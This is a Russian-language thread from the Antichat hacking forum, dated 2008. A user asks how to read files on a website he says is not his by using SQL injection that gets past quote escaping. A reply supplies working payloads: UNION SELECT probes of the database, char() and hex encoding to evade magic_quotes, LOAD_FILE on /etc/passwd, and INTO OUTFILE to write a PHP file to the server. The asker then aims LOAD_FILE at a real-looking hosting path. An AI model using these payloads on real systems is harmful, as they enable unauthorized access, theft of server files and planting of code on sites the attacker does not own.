Форум АНТИЧАТ - файлы на сервер

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - файлы на сервер (https://forum.antichat.xyz/showthread.php?t=96109)

downloader

12.12.2008 21:12

файлы на сервер

доброго вам дня :)

я хачю у вас просить чтобы вы мне расказали как можна узнати какие файлы на фтп через sql inject если тама сидит филитар на кавычки?

извините за мой рускии...

downloader

13.12.2008 11:14

ребят но помогите пожалуйста... я сделал через file_load('') но мне показавает
http://s47.radikal.ru/i115/0812/a1/1e464014fede.jpg это филитар на кавычки :( как мне его обаити скажите плз

preda1or

13.12.2008 11:19

На сколько я понял все кавычки экранируются слэшем, т.е. " ' " заменяется на " \' ".
magic_quotes ON

downloader

13.12.2008 11:30

да ты правилина понел, да но это не мои сайт, я хачю пасматрети на нём какие фаилы потому что не магу наити один файл... как мне обайти?

Nelzone

13.12.2008 11:33

какой сайт где ссылка?

preda1or

13.12.2008 11:39

используй
char и обратные кавычки

Цитата:

SELECT * FROM `user` where `login`= char(39,32,111,114,32,49,32,47,42);

downloader

13.12.2008 11:55

да но всё это мне надо написати sql inject и чтобы мне показала file_load

PHP код:


		
			
script.php?id=-1+union+select+char(39,32,111,114,32,49,32,47,42)/*

но мне это показывает что я написал в char, а мне нужна чтобы делал запрос на сервер чтобы показал файлы которые в сайте..

preda1or

13.12.2008 12:17

Для начала

Цитата:

script.php?id=-1+union+select+user()/*
script.php?id=-1+union+select+version()/*
script.php?id=-1+union+select+database()/*
script.php?id=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES/*

потом пробуй
прочитать файл(нужно знать путь до него)

Цитата:

script.php?id=-1+union+select+LOAD_FILE(0x276574632f7061737377642 f)/*

записать в файл

Цитата:

script.php?id=-1+union+select+0xКОДИРОВАННАЯСТРО� �А+into+outfile+'/tmp/aaa.php'/*

где 0x276574632f7061737377642f это
"0х" - преффикс HEX
"276574632f7061737377642f" = "'etc/passwd'"
(http://www.string-functions.com/string-hex.aspx)

p.s. пробелы лишние убери.

Tigger

13.12.2008 12:32

Не факт вообще, что есть возможность просматривать файлы.

downloader

13.12.2008 12:39

preda1or спасибо тебе за то что помагаеш..

вот я паставил в hex

PHP код:


		
			
/home/content/r/o/b/robbstudio/html/

получиласи

PHP код:


		
			
2f686f6d652f636f6e74656e742f722f6f2f622f726f626273747564696f2f68746d6c2f

урл получился такой:

PHP код:


		
			
script?id=-1+union+select+LOAD_FILE(0x2f686f6d652f636f6e74656e742f722f6f2f622f726f626273747564696f2f68746d6c2f)/*

но мне пути не показавает, ести ишё методы чтобы видить файлы на сервер?

Время: 23:02

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице